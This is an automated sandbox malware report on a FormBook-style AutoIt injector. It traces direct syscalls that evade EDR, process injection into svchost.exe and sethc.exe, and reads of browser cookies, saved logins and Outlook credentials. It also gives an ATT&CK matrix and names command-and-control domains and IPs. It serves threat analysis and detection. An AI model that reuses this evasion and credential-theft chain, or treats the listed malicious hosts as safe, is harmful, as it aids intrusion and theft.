                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]2_2_0323A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]2_2_0323A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]2_2_0323A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]2_2_0323A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]2_2_0323A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]2_2_0323A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032649D0 mov eax, dword ptr fs:[00000030h]2_2_032649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FA9D3 mov eax, dword ptr fs:[00000030h]2_2_032FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]2_2_03252835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]2_2_03252835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]2_2_03252835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03252835 mov ecx, dword ptr fs:[00000030h]2_2_03252835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]2_2_03252835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]2_2_03252835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A830 mov eax, dword ptr fs:[00000030h]2_2_0326A830
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D483A mov eax, dword ptr fs:[00000030h]2_2_032D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D483A mov eax, dword ptr fs:[00000030h]2_2_032D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BC810 mov eax, dword ptr fs:[00000030h]2_2_032BC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BE872 mov eax, dword ptr fs:[00000030h]2_2_032BE872
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_0052A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_0052A66C
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_00518189 SetUnhandledExceptionFilter,0_2_00518189
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_005181AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_005181AC

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exeNtWriteVirtualMemory: Direct from: 0x77762E3CJump to behavior
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exeNtMapViewOfSection: Direct from: 0x77762D1CJump to behavior
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exeNtNotifyChangeKey: Direct from: 0x77763C2CJump to behavior
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exeNtCreateMutant: Direct from: 0x777635CCJump to behavior
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exeNtResumeThread: Direct from: 0x777636ACJump to behavior
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exeNtQuerySystemInformation: Direct from: 0x77762DFCJump to behavior
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exeNtAllocateVirtualMemory: Direct from: 0x77762BFCJump to behavior
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exeNtReadFile: Direct from: 0x77762ADCJump to behavior
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exeNtDelayExecution: Direct from: 0x77762DDCJump to behavior
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exeNtWriteVirtualMemory: Direct from: 0x7776490CJump to behavior
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exeNtQueryInformationProcess: Direct from: 0x77762C26Jump to behavior
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exeNtResumeThread: Direct from: 0x77762FBCJump to behavior
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exeNtCreateUserProcess: Direct from: 0x7776371CJump to behavior
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exeNtSetInformationThread: Direct from: 0x777563F9Jump to behavior
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exeNtAllocateVirtualMemory: Direct from: 0x77763C9CJump to behavior
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exeNtSetInformationThread: Direct from: 0x77762B4CJump to behavior
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exeNtQueryAttributesFile: Direct from: 0x77762E6CJump to behavior
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exeNtClose: Direct from: 0x77762B6C
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exeNtReadVirtualMemory: Direct from: 0x77762E8CJump to behavior
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exeNtCreateKey: Direct from: 0x77762C6CJump to behavior
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exeNtQuerySystemInformation: Direct from: 0x777648CCJump to behavior
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exeNtAllocateVirtualMemory: Direct from: 0x777648ECJump to behavior
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exeNtQueryVolumeInformationFile: Direct from: 0x77762F2CJump to behavior
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exeNtOpenSection: Direct from: 0x77762E0CJump to behavior
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exeNtDeviceIoControlFile: Direct from: 0x77762AECJump to behavior
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exeNtAllocateVirtualMemory: Direct from: 0x77762BECJump to behavior
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exeNtQueryInformationToken: Direct from: 0x77762CACJump to behavior
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exeNtTerminateThread: Direct from: 0x77762FCCJump to behavior
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exeNtCreateFile: Direct from: 0x77762FECJump to behavior
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exeNtOpenFile: Direct from: 0x77762DCCJump to behavior
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exeNtOpenKeyEx: Direct from: 0x77762B9CJump to behavior
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exeNtSetInformationProcess: Direct from: 0x77762C5CJump to behavior
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exeNtProtectVirtualMemory: Direct from: 0x77762F9CJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\sethc.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\sethc.exeSection loaded: NULL target: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\sethc.exeSection loaded: NULL target: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\sethc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\sethc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\sethc.exeThread register set: target process: 6920Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\sethc.exeThread APC queued: target process: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6F8008Jump to behavior
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_0052B106 LogonUserW,0_2_0052B106
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_004F3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_004F3D19
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_0053411C SendInput,keybd_event,0_2_0053411C
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_005374E7 mouse_event,0_2_005374E7
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\ek8LkB2Cgo.exe"Jump to behavior
                Source: C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exeProcess created: C:\Windows\SysWOW64\sethc.exe "C:\Windows\SysWOW64\sethc.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\sethc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_0052A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_0052A66C
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_005371FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_005371FA
                Source: ek8LkB2Cgo.exe, RlKZsaoEJNpD.exe, 00000005.00000002.3777859704.0000000001970000.00000002.00000001.00040000.00000000.sdmp, RlKZsaoEJNpD.exe, 00000005.00000000.1469313265.0000000001971000.00000002.00000001.00040000.00000000.sdmp, RlKZsaoEJNpD.exe, 00000007.00000002.3777694135.0000000001850000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: RlKZsaoEJNpD.exe, 00000005.00000002.3777859704.0000000001970000.00000002.00000001.00040000.00000000.sdmp, RlKZsaoEJNpD.exe, 00000005.00000000.1469313265.0000000001971000.00000002.00000001.00040000.00000000.sdmp, RlKZsaoEJNpD.exe, 00000007.00000002.3777694135.0000000001850000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: RlKZsaoEJNpD.exe, 00000005.00000002.3777859704.0000000001970000.00000002.00000001.00040000.00000000.sdmp, RlKZsaoEJNpD.exe, 00000005.00000000.1469313265.0000000001971000.00000002.00000001.00040000.00000000.sdmp, RlKZsaoEJNpD.exe, 00000007.00000002.3777694135.0000000001850000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
                Source: ek8LkB2Cgo.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                Source: RlKZsaoEJNpD.exe, 00000005.00000002.3777859704.0000000001970000.00000002.00000001.00040000.00000000.sdmp, RlKZsaoEJNpD.exe, 00000005.00000000.1469313265.0000000001971000.00000002.00000001.00040000.00000000.sdmp, RlKZsaoEJNpD.exe, 00000007.00000002.3777694135.0000000001850000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_005165C4 cpuid 0_2_005165C4
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_0054091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,0_2_0054091D
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_0056B340 GetUserNameW,0_2_0056B340
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_00521E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00521E8E
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_0050DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0050DDC0

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.3778150312.00000000049B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3778103471.0000000004960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1542930105.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3780336358.0000000005610000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3771923815.0000000000C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1542601983.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3778462020.00000000030B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1543326979.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\sethc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\sethc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\sethc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\sethc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\sethc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\sethc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\sethc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\sethc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\sethc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: ek8LkB2Cgo.exeBinary or memory string: WIN_81
                Source: ek8LkB2Cgo.exeBinary or memory string: WIN_XP
                Source: ek8LkB2Cgo.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
                Source: ek8LkB2Cgo.exeBinary or memory string: WIN_XPe
                Source: ek8LkB2Cgo.exeBinary or memory string: WIN_VISTA
                Source: ek8LkB2Cgo.exeBinary or memory string: WIN_7
                Source: ek8LkB2Cgo.exeBinary or memory string: WIN_8

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.3778150312.00000000049B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3778103471.0000000004960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1542930105.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3780336358.0000000005610000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3771923815.0000000000C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1542601983.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3778462020.00000000030B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1543326979.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_00548C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00548C4F
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_0054923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_0054923B

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		3
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		11
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		3
                Obfuscated Files or Information                		NTDS116
                System Information Discovery                		Distributed Component Object Model11
                Input Capture                		4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                DLL Side-Loading                		LSA Secrets151
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection                		2
                Valid Accounts                		Cached Domain Credentials2
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation                		Proc Filesystem11
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1568372 Sample: ek8LkB2Cgo.exe Startdate: 04/12/2024 Architecture: WINDOWS Score: 100 28 www.soainsaat.xyz 2->28 30 www.futurorks.xyz 2->30 32 16 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Antivirus detection for URL or domain 2->44 46 Multi AV Scanner detection for submitted file 2->46 50 4 other signatures 2->50 10 ek8LkB2Cgo.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 68 Switches to a custom stack to bypass stack traces 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 RlKZsaoEJNpD.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 sethc.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 RlKZsaoEJNpD.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.futurorks.xyz 203.161.43.228, 49997, 49998, 49999 VNPT-AS-VNVNPTCorpVN Malaysia 22->34 36 www.327531.buzz 43.199.54.158, 49907, 49913, 49918 LILLY-ASUS Japan 22->36 38 11 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                ek8LkB2Cgo.exe74%ReversingLabsWin32.Trojan.AutoitInject
                ek8LkB2Cgo.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.duwixushx.xyz/fyc8/100%Avira URL Cloudmalware
